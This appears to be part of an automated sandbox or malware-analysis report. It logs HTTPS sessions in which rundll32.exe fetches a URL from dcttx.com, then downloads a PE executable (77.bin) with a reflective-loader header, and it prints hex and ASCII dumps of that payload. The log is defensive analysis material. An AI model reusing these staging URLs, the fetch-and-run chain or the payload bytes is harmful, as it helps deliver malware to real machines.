                      2024-12-22 08:17:08 UTC16384INData Raw: 00 dd 5d f8 dd 45 f8 59 dd 45 08 59 da e9 df e0 f6 c4 44 7a 0e 56 53 e8 18 40 00 00 dd 45 f8 59 59 eb 22 f6 c3 20 75 ed dd 45 f8 53 83 ec 10 dd 5c 24 08 dd 45 08 dd 1c 24 6a 0c 6a 10 e8 9d 3d 00 00 83 c4 1c 5e 5b c9 c3 6a 0c 68 a0 7b 41 00 e8 7e 1f 00 00 6a 0e e8 47 42 00 00 59 83 65 fc 00 8b 75 08 8b 4e 04 85 c9 74 2f a1 b4 ae 41 00 ba b0 ae 41 00 89 45 e4 85 c0 74 11 39 08 75 2c 8b 48 04 89 4a 04 50 e8 a0 f0 ff ff 59 ff 76 04 e8 97 f0 ff ff 59 83 66 04 00 c7 45 fc fe ff ff ff e8 0a 00 00 00 e8 6d 1f 00 00 c3 8b d0 eb c5 6a 0e e8 13 41 00 00 59 c3 cc cc cc cc cc cc cc cc cc cc 8b 54 24 04 8b 4c 24 08 f7 c2 03 00 00 00 75 3c 8b 02 3a 01 75 2e 0a c0 74 26 3a 61 01 75 25 0a e4 74 1d c1 e8 10 3a 41 02 75 19 0a c0 74 11 3a 61 03 75 10 83 c1 04 83 c2 04 0a e4
                      Data Ascii: ]EYEYDzVS@EYY" uES\$E$jj=^[jh{A~jGBYeuNt/AAEt9u,HJPYvYfEmjAYT$L$u<:u.t&:au%t:Aut:au
                      2024-12-22 08:17:09 UTC16384INData Raw: 07 00 00 83 c4 0c 81 ea fe 03 00 00 8b 45 10 89 10 5d c3 8b ff 55 8b ec 51 9b dd 7d fc 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 dd 7d fc db e2 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 9b d9 7d fc 8b 45 0c 8b 4d 08 23 4d 0c f7 d0 66 23 45 fc 66 0b c1 0f b7 c0 89 45 0c d9 6d 0c 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 51 8a 4d 08 f6 c1 01 74 0a db 2d 30 93 41 00 db 5d 08 9b f6 c1 08 74 10 9b df e0 db 2d 30 93 41 00 dd 5d f8 9b 9b df e0 f6 c1 10 74 0a db 2d 3c 93 41 00 dd 5d f8 9b f6 c1 04 74 09 d9 ee d9 e8 de f1 dd d8 9b f6 c1 20 74 06 d9 eb dd 5d f8 9b c9 c3 6a 08 68 50 7c 41 00 e8 10 df ff ff 33 c0 39 05 dc eb 41 00 74 56 f6 45 08 40 74 48 39 05 48 93 41 00 74 40 89 45 fc 0f ae 55 08 eb 2e 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40
                      Data Ascii: E]UQ}EUQ}EUQ}EM#Mf#EfEmEUQQMt-0A]t-0A]t-<A]t t]jhP|A39AtVE@tH9HAt@EU.E=t=t33@
                      2024-12-22 08:17:09 UTC16384INData Raw: ff ff ff b6 84 00 00 00 e8 1f 71 ff ff ff b6 88 00 00 00 e8 14 71 ff ff ff b6 8c 00 00 00 e8 09 71 ff ff ff b6 90 00 00 00 e8 fe 70 ff ff ff b6 94 00 00 00 e8 f3 70 ff ff ff b6 98 00 00 00 e8 e8 70 ff ff ff b6 9c 00 00 00 e8 dd 70 ff ff ff b6 a0 00 00 00 e8 d2 70 ff ff ff b6 a4 00 00 00 e8 c7 70 ff ff ff b6 a8 00 00 00 e8 bc 70 ff ff ff b6 bc 00 00 00 e8 b1 70 ff ff ff b6 c0 00 00 00 e8 a6 70 ff ff ff b6 c4 00 00 00 e8 9b 70 ff ff ff b6 c8 00 00 00 e8 90 70 ff ff ff b6 cc 00 00 00 e8 85 70 ff ff 83 c4 40 ff b6 d0 00 00 00 e8 77 70 ff ff ff b6 b8 00 00 00 e8 6c 70 ff ff ff b6 d8 00 00 00 e8 61 70 ff ff ff b6 dc 00 00 00 e8 56 70 ff ff ff b6 e0 00 00 00 e8 4b 70 ff ff ff b6 e4 00 00 00 e8 40 70 ff ff ff b6 e8 00 00 00 e8 35 70 ff ff ff b6 ec 00 00 00 e8 2a
                      Data Ascii: qqqpppppppppppp@wplpapVpKp@p5p*
                      2024-12-22 08:17:09 UTC16384INData Raw: 75 f8 53 ff 75 14 ff 75 10 ff 75 0c 56 e8 9f fb ff ff 83 c4 20 e8 3c 5b ff ff 83 b8 94 00 00 00 00 74 05 e8 59 84 ff ff 5f 5e 5b c9 c3 8b ff 55 8b ec 56 ff 75 08 8b f1 e8 ca 30 ff ff c7 06 88 77 41 00 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 53 56 57 e8 ff 5a ff ff 83 b8 0c 02 00 00 00 8b 45 18 8b 4d 08 bf 63 73 6d e0 be ff ff ff 1f bb 22 05 93 19 75 20 8b 11 3b d7 74 1a 81 fa 26 00 00 80 74 12 8b 10 23 d6 3b d3 72 0a f6 40 20 01 0f 85 93 00 00 00 f6 41 04 66 74 23 83 78 04 00 0f 84 83 00 00 00 83 7d 1c 00 75 7d 6a ff 50 ff 75 14 ff 75 0c e8 7a f4 ff ff 83 c4 10 eb 6a 83 78 0c 00 75 12 8b 10 23 d6 81 fa 21 05 93 19 72 58 83 78 1c 00 74 52 39 39 75 32 83 79 10 03 72 2c 39 59 14 76 27 8b 51 1c 8b 52 08 85 d2 74 1d 0f b6 75 24 56 ff 75 20 ff 75 1c 50 ff 75 14 ff
                      Data Ascii: uSuuuV <[tY_^[UVu0wA^]USVWZEMcsm"u ;t&t#;r@ Aft#x}u}jPuuzjxu#!rXxtR99u2yr,9Yv'QRtu$Vu uPu
                      2024-12-22 08:17:09 UTC16384INData Raw: 00 00 00 ff ff ff ff b0 40 41 00 00 00 00 00 bb 40 41 00 01 00 00 00 c6 40 41 00 02 00 00 00 d1 40 41 00 03 00 00 00 de 40 41 00 04 00 00 00 ec 40 41 00 05 00 00 00 f9 40 41 00 06 00 00 00 06 41 41 00 07 00 00 00 13 41 41 00 07 00 00 00 1e 41 41 00 09 00 00 00 2c 41 41 00 0a 00 00 00 3a 41 41 00 0b 00 00 00 48 41 41 00 22 05 93 19 0d 00 00 00 e0 7e 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 80 41 41 00 00 00 00 00 8b 41 41 00 22 05 93 19 02 00 00 00 6c 7f 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff c0 41 41 00 ff ff ff ff cb 41 41 00 22 05 93 19 02 00 00 00 a0 7f 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff f0 41 41 00
                      Data Ascii: @A@A@A@A@A@A@AAAAAAA,AA:AAHAA"~AAAAA"lAAAAA"AAA
                      2024-12-22 08:17:09 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Data Ascii:
                      2024-12-22 08:17:09 UTC9507INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Data Ascii:


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.44973538.147.186.1384437544C:\Windows\SysWOW64\rundll32.exe
                      TimestampBytes transferredDirectionData
                      2024-12-22 08:17:07 UTC57OUTGET /19/77.bin HTTP/1.1
                      accept: */*
                      host: dcttx.com
                      2024-12-22 08:17:08 UTC291INHTTP/1.1 200 OK
                      Server: nginx
                      Date: Sun, 22 Dec 2024 08:17:08 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 140288
                      Last-Modified: Thu, 19 Dec 2024 15:27:56 GMT
                      Connection: close
                      ETag: "67643b7c-22400"
                      Strict-Transport-Security: max-age=31536000
                      Accept-Ranges: bytes
                      2024-12-22 08:17:08 UTC16093INData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 50 05 00 20 02 00 ff d0 c3 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e2 0c 41 1d a6 6d 2f 4e a6 6d 2f 4e a6 6d 2f 4e c9 1b b1 4e b2 6d 2f 4e c9 1b 85 4e d0 6d 2f 4e c9 1b 84 4e 8a 6d 2f 4e af 15 bc 4e ad 6d 2f 4e a6 6d 2e 4e 29 6d 2f 4e c9 1b 80 4e ab 6d 2f 4e c9 1b b2 4e a7 6d 2f 4e 52 69 63 68 a6 6d 2f 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 74 12 b6 66 00 00 00 00 00 00 00 00 e0 00 02
                      Data Ascii: MZERXP @!L!This program cannot be run in DOS mode.$Am/Nm/Nm/NNm/NNm/NNm/NNm/Nm.N)m/NNm/NNm/NRichm/NPELtf
                      2024-12-22 08:17:08 UTC16384INData Raw: 08 89 4b 04 89 9e 80 01 00 00 ff 86 78 01 00 00 57 89 9e 7c 01 00 00 ff 15 24 50 41 00 b8 01 00 00 00 5f 5b 8b e5 5d c3 b9 01 00 00 00 53 8d be 98 00 00 00 89 4e 30 c7 46 34 03 00 00 00 89 46 38 89 4e 3c e8 5a d5 ff ff 85 c0 75 0d 8b 13 53 50 8b 02 50 ff 15 e4 50 41 00 5f 33 c0 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b f0 ff 15 4c 50 41 00 8b d8 8b 46 64 83 f8 03 0f 84 cf 00 00 00 8d be 5c 01 00 00 57 e8 0b ec ff ff 8b 4e 64 83 f9 01 74 0b 8b 56 64 85 d2 0f 85 aa 00 00 00 c7 46 64 02 00 00 00 c7 07 00 00 00 00 8b c3 e8 b4 01 00 00 8b 46 60 85 c0 74 20 83 7e 3c 00 74 13 8b 4e 40 6a 00 6a 10 68 40 74 41 00 51 ff 15 f4 51 41 00 c7 46 60 00 00 00 00 83 7e 30 00 74 22 8b 56 48 52 e8 7e ec ff ff 8b 46 04 83 c4 04 50 ff 15 38
                      Data Ascii: KxW|$PA_[]SN0F4F8N<ZuSPPPA_3[]SVWLPAFd\WNdtVdFdF`t ~<tN@jjh@tAQQAF`~0t"VHR~FP8
                      2024-12-22 08:17:08 UTC16384INData Raw: 00 dd 5d f8 dd 45 f8 59 dd 45 08 59 da e9 df e0 f6 c4 44 7a 0e 56 53 e8 18 40 00 00 dd 45 f8 59 59 eb 22 f6 c3 20 75 ed dd 45 f8 53 83 ec 10 dd 5c 24 08 dd 45 08 dd 1c 24 6a 0c 6a 10 e8 9d 3d 00 00 83 c4 1c 5e 5b c9 c3 6a 0c 68 a0 7b 41 00 e8 7e 1f 00 00 6a 0e e8 47 42 00 00 59 83 65 fc 00 8b 75 08 8b 4e 04 85 c9 74 2f a1 b4 ae 41 00 ba b0 ae 41 00 89 45 e4 85 c0 74 11 39 08 75 2c 8b 48 04 89 4a 04 50 e8 a0 f0 ff ff 59 ff 76 04 e8 97 f0 ff ff 59 83 66 04 00 c7 45 fc fe ff ff ff e8 0a 00 00 00 e8 6d 1f 00 00 c3 8b d0 eb c5 6a 0e e8 13 41 00 00 59 c3 cc cc cc cc cc cc cc cc cc cc 8b 54 24 04 8b 4c 24 08 f7 c2 03 00 00 00 75 3c 8b 02 3a 01 75 2e 0a c0 74 26 3a 61 01 75 25 0a e4 74 1d c1 e8 10 3a 41 02 75 19 0a c0 74 11 3a 61 03 75 10 83 c1 04 83 c2 04 0a e4
                      Data Ascii: ]EYEYDzVS@EYY" uES\$E$jj=^[jh{A~jGBYeuNt/AAEt9u,HJPYvYfEmjAYT$L$u<:u.t&:au%t:Aut:au
                      2024-12-22 08:17:09 UTC16384INData Raw: 07 00 00 83 c4 0c 81 ea fe 03 00 00 8b 45 10 89 10 5d c3 8b ff 55 8b ec 51 9b dd 7d fc 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 dd 7d fc db e2 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 9b d9 7d fc 8b 45 0c 8b 4d 08 23 4d 0c f7 d0 66 23 45 fc 66 0b c1 0f b7 c0 89 45 0c d9 6d 0c 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 51 8a 4d 08 f6 c1 01 74 0a db 2d 30 93 41 00 db 5d 08 9b f6 c1 08 74 10 9b df e0 db 2d 30 93 41 00 dd 5d f8 9b 9b df e0 f6 c1 10 74 0a db 2d 3c 93 41 00 dd 5d f8 9b f6 c1 04 74 09 d9 ee d9 e8 de f1 dd d8 9b f6 c1 20 74 06 d9 eb dd 5d f8 9b c9 c3 6a 08 68 50 7c 41 00 e8 10 df ff ff 33 c0 39 05 dc eb 41 00 74 56 f6 45 08 40 74 48 39 05 48 93 41 00 74 40 89 45 fc 0f ae 55 08 eb 2e 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40
                      Data Ascii: E]UQ}EUQ}EUQ}EM#Mf#EfEmEUQQMt-0A]t-0A]t-<A]t t]jhP|A39AtVE@tH9HAt@EU.E=t=t33@
                      2024-12-22 08:17:09 UTC16384INData Raw: ff ff ff b6 84 00 00 00 e8 1f 71 ff ff ff b6 88 00 00 00 e8 14 71 ff ff ff b6 8c 00 00 00 e8 09 71 ff ff ff b6 90 00 00 00 e8 fe 70 ff ff ff b6 94 00 00 00 e8 f3 70 ff ff ff b6 98 00 00 00 e8 e8 70 ff ff ff b6 9c 00 00 00 e8 dd 70 ff ff ff b6 a0 00 00 00 e8 d2 70 ff ff ff b6 a4 00 00 00 e8 c7 70 ff ff ff b6 a8 00 00 00 e8 bc 70 ff ff ff b6 bc 00 00 00 e8 b1 70 ff ff ff b6 c0 00 00 00 e8 a6 70 ff ff ff b6 c4 00 00 00 e8 9b 70 ff ff ff b6 c8 00 00 00 e8 90 70 ff ff ff b6 cc 00 00 00 e8 85 70 ff ff 83 c4 40 ff b6 d0 00 00 00 e8 77 70 ff ff ff b6 b8 00 00 00 e8 6c 70 ff ff ff b6 d8 00 00 00 e8 61 70 ff ff ff b6 dc 00 00 00 e8 56 70 ff ff ff b6 e0 00 00 00 e8 4b 70 ff ff ff b6 e4 00 00 00 e8 40 70 ff ff ff b6 e8 00 00 00 e8 35 70 ff ff ff b6 ec 00 00 00 e8 2a
                      Data Ascii: qqqpppppppppppp@wplpapVpKp@p5p*


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.44973638.147.186.1384437668C:\Windows\SysWOW64\rundll32.exe
                      TimestampBytes transferredDirectionData
                      2024-12-22 08:17:08 UTC56OUTGET /19/7.txt HTTP/1.1
                      accept: */*
                      host: dcttx.com
                      2024-12-22 08:17:08 UTC270INHTTP/1.1 200 OK
                      Server: nginx
                      Date: Sun, 22 Dec 2024 08:17:08 GMT
                      Content-Type: text/plain
                      Content-Length: 27
                      Last-Modified: Thu, 19 Dec 2024 15:28:55 GMT
                      Connection: close
                      ETag: "67643bb7-1b"
                      Strict-Transport-Security: max-age=31536000
                      Accept-Ranges: bytes
                      2024-12-22 08:17:08 UTC27INData Raw: 68 74 74 70 73 3a 2f 2f 64 63 74 74 78 2e 63 6f 6d 2f 31 39 2f 37 37 2e 62 69 6e
                      Data Ascii: https://dcttx.com/19/77.bin


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.44973738.147.186.1384437668C:\Windows\SysWOW64\rundll32.exe
                      TimestampBytes transferredDirectionData
                      2024-12-22 08:17:10 UTC57OUTGET /19/77.bin HTTP/1.1
                      accept: */*
                      host: dcttx.com
                      2024-12-22 08:17:11 UTC291INHTTP/1.1 200 OK
                      Server: nginx
                      Date: Sun, 22 Dec 2024 08:17:10 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 140288
                      Last-Modified: Thu, 19 Dec 2024 15:27:56 GMT
                      Connection: close
                      ETag: "67643b7c-22400"
                      Strict-Transport-Security: max-age=31536000
                      Accept-Ranges: bytes
                      2024-12-22 08:17:11 UTC16093INData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 50 05 00 20 02 00 ff d0 c3 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e2 0c 41 1d a6 6d 2f 4e a6 6d 2f 4e a6 6d 2f 4e c9 1b b1 4e b2 6d 2f 4e c9 1b 85 4e d0 6d 2f 4e c9 1b 84 4e 8a 6d 2f 4e af 15 bc 4e ad 6d 2f 4e a6 6d 2e 4e 29 6d 2f 4e c9 1b 80 4e ab 6d 2f 4e c9 1b b2 4e a7 6d 2f 4e 52 69 63 68 a6 6d 2f 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 74 12 b6 66 00 00 00 00 00 00 00 00 e0 00 02
                      Data Ascii: MZERXP @!L!This program cannot be run in DOS mode.$Am/Nm/Nm/NNm/NNm/NNm/NNm/Nm.N)m/NNm/NNm/NRichm/NPELtf
                      2024-12-22 08:17:11 UTC16384INData Raw: 08 89 4b 04 89 9e 80 01 00 00 ff 86 78 01 00 00 57 89 9e 7c 01 00 00 ff 15 24 50 41 00 b8 01 00 00 00 5f 5b 8b e5 5d c3 b9 01 00 00 00 53 8d be 98 00 00 00 89 4e 30 c7 46 34 03 00 00 00 89 46 38 89 4e 3c e8 5a d5 ff ff 85 c0 75 0d 8b 13 53 50 8b 02 50 ff 15 e4 50 41 00 5f 33 c0 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b f0 ff 15 4c 50 41 00 8b d8 8b 46 64 83 f8 03 0f 84 cf 00 00 00 8d be 5c 01 00 00 57 e8 0b ec ff ff 8b 4e 64 83 f9 01 74 0b 8b 56 64 85 d2 0f 85 aa 00 00 00 c7 46 64 02 00 00 00 c7 07 00 00 00 00 8b c3 e8 b4 01 00 00 8b 46 60 85 c0 74 20 83 7e 3c 00 74 13 8b 4e 40 6a 00 6a 10 68 40 74 41 00 51 ff 15 f4 51 41 00 c7 46 60 00 00 00 00 83 7e 30 00 74 22 8b 56 48 52 e8 7e ec ff ff 8b 46 04 83 c4 04 50 ff 15 38
                      Data Ascii: KxW|$PA_[]SN0F4F8N<ZuSPPPA_3[]SVWLPAFd\WNdtVdFdF`t ~<tN@jjh@tAQQAF`~0t"VHR~FP8
                      2024-12-22 08:17:11 UTC16384INData Raw: 00 dd 5d f8 dd 45 f8 59 dd 45 08 59 da e9 df e0 f6 c4 44 7a 0e 56 53 e8 18 40 00 00 dd 45 f8 59 59 eb 22 f6 c3 20 75 ed dd 45 f8 53 83 ec 10 dd 5c 24 08 dd 45 08 dd 1c 24 6a 0c 6a 10 e8 9d 3d 00 00 83 c4 1c 5e 5b c9 c3 6a 0c 68 a0 7b 41 00 e8 7e 1f 00 00 6a 0e e8 47 42 00 00 59 83 65 fc 00 8b 75 08 8b 4e 04 85 c9 74 2f a1 b4 ae 41 00 ba b0 ae 41 00 89 45 e4 85 c0 74 11 39 08 75 2c 8b 48 04 89 4a 04 50 e8 a0 f0 ff ff 59 ff 76 04 e8 97 f0 ff ff 59 83 66 04 00 c7 45 fc fe ff ff ff e8 0a 00 00 00 e8 6d 1f 00 00 c3 8b d0 eb c5 6a 0e e8 13 41 00 00 59 c3 cc cc cc cc cc cc cc cc cc cc 8b 54 24 04 8b 4c 24 08 f7 c2 03 00 00 00 75 3c 8b 02 3a 01 75 2e 0a c0 74 26 3a 61 01 75 25 0a e4 74 1d c1 e8 10 3a 41 02 75 19 0a c0 74 11 3a 61 03 75 10 83 c1 04 83 c2 04 0a e4
                      Data Ascii: ]EYEYDzVS@EYY" uES\$E$jj=^[jh{A~jGBYeuNt/AAEt9u,HJPYvYfEmjAYT$L$u<:u.t&:au%t:Aut:au
                      2024-12-22 08:17:11 UTC16384INData Raw: 07 00 00 83 c4 0c 81 ea fe 03 00 00 8b 45 10 89 10 5d c3 8b ff 55 8b ec 51 9b dd 7d fc 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 dd 7d fc db e2 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 9b d9 7d fc 8b 45 0c 8b 4d 08 23 4d 0c f7 d0 66 23 45 fc 66 0b c1 0f b7 c0 89 45 0c d9 6d 0c 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 51 8a 4d 08 f6 c1 01 74 0a db 2d 30 93 41 00 db 5d 08 9b f6 c1 08 74 10 9b df e0 db 2d 30 93 41 00 dd 5d f8 9b 9b df e0 f6 c1 10 74 0a db 2d 3c 93 41 00 dd 5d f8 9b f6 c1 04 74 09 d9 ee d9 e8 de f1 dd d8 9b f6 c1 20 74 06 d9 eb dd 5d f8 9b c9 c3 6a 08 68 50 7c 41 00 e8 10 df ff ff 33 c0 39 05 dc eb 41 00 74 56 f6 45 08 40 74 48 39 05 48 93 41 00 74 40 89 45 fc 0f ae 55 08 eb 2e 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40
                      Data Ascii: E]UQ}EUQ}EUQ}EM#Mf#EfEmEUQQMt-0A]t-0A]t-<A]t t]jhP|A39AtVE@tH9HAt@EU.E=t=t33@
                      2024-12-22 08:17:11 UTC16384INData Raw: ff ff ff b6 84 00 00 00 e8 1f 71 ff ff ff b6 88 00 00 00 e8 14 71 ff ff ff b6 8c 00 00 00 e8 09 71 ff ff ff b6 90 00 00 00 e8 fe 70 ff ff ff b6 94 00 00 00 e8 f3 70 ff ff ff b6 98 00 00 00 e8 e8 70 ff ff ff b6 9c 00 00 00 e8 dd 70 ff ff ff b6 a0 00 00 00 e8 d2 70 ff ff ff b6 a4 00 00 00 e8 c7 70 ff ff ff b6 a8 00 00 00 e8 bc 70 ff ff ff b6 bc 00 00 00 e8 b1 70 ff ff ff b6 c0 00 00 00 e8 a6 70 ff ff ff b6 c4 00 00 00 e8 9b 70 ff ff ff b6 c8 00 00 00 e8 90 70 ff ff ff b6 cc 00 00 00 e8 85 70 ff ff 83 c4 40 ff b6 d0 00 00 00 e8 77 70 ff ff ff b6 b8 00 00 00 e8 6c 70 ff ff ff b6 d8 00 00 00 e8 61 70 ff ff ff b6 dc 00 00 00 e8 56 70 ff ff ff b6 e0 00 00 00 e8 4b 70 ff ff ff b6 e4 00 00 00 e8 40 70 ff ff ff b6 e8 00 00 00 e8 35 70 ff ff ff b6 ec 00 00 00 e8 2a
                      Data Ascii: qqqpppppppppppp@wplpapVpKp@p5p*
                      2024-12-22 08:17:11 UTC16384INData Raw: 75 f8 53 ff 75 14 ff 75 10 ff 75 0c 56 e8 9f fb ff ff 83 c4 20 e8 3c 5b ff ff 83 b8 94 00 00 00 00 74 05 e8 59 84 ff ff 5f 5e 5b c9 c3 8b ff 55 8b ec 56 ff 75 08 8b f1 e8 ca 30 ff ff c7 06 88 77 41 00 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 53 56 57 e8 ff 5a ff ff 83 b8 0c 02 00 00 00 8b 45 18 8b 4d 08 bf 63 73 6d e0 be ff ff ff 1f bb 22 05 93 19 75 20 8b 11 3b d7 74 1a 81 fa 26 00 00 80 74 12 8b 10 23 d6 3b d3 72 0a f6 40 20 01 0f 85 93 00 00 00 f6 41 04 66 74 23 83 78 04 00 0f 84 83 00 00 00 83 7d 1c 00 75 7d 6a ff 50 ff 75 14 ff 75 0c e8 7a f4 ff ff 83 c4 10 eb 6a 83 78 0c 00 75 12 8b 10 23 d6 81 fa 21 05 93 19 72 58 83 78 1c 00 74 52 39 39 75 32 83 79 10 03 72 2c 39 59 14 76 27 8b 51 1c 8b 52 08 85 d2 74 1d 0f b6 75 24 56 ff 75 20 ff 75 1c 50 ff 75 14 ff
                      Data Ascii: uSuuuV <[tY_^[UVu0wA^]USVWZEMcsm"u ;t&t#;r@ Aft#x}u}jPuuzjxu#!rXxtR99u2yr,9Yv'QRtu$Vu uPu
                      2024-12-22 08:17:11 UTC16384INData Raw: 00 00 00 ff ff ff ff b0 40 41 00 00 00 00 00 bb 40 41 00 01 00 00 00 c6 40 41 00 02 00 00 00 d1 40 41 00 03 00 00 00 de 40 41 00 04 00 00 00 ec 40 41 00 05 00 00 00 f9 40 41 00 06 00 00 00 06 41 41 00 07 00 00 00 13 41 41 00 07 00 00 00 1e 41 41 00 09 00 00 00 2c 41 41 00 0a 00 00 00 3a 41 41 00 0b 00 00 00 48 41 41 00 22 05 93 19 0d 00 00 00 e0 7e 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 80 41 41 00 00 00 00 00 8b 41 41 00 22 05 93 19 02 00 00 00 6c 7f 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff c0 41 41 00 ff ff ff ff cb 41 41 00 22 05 93 19 02 00 00 00 a0 7f 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff f0 41 41 00
                      Data Ascii: @A@A@A@A@A@A@AAAAAAA,AA:AAHAA"~AAAAA"lAAAAA"AAA
                      2024-12-22 08:17:11 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Data Ascii:
                      2024-12-22 08:17:11 UTC9507INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 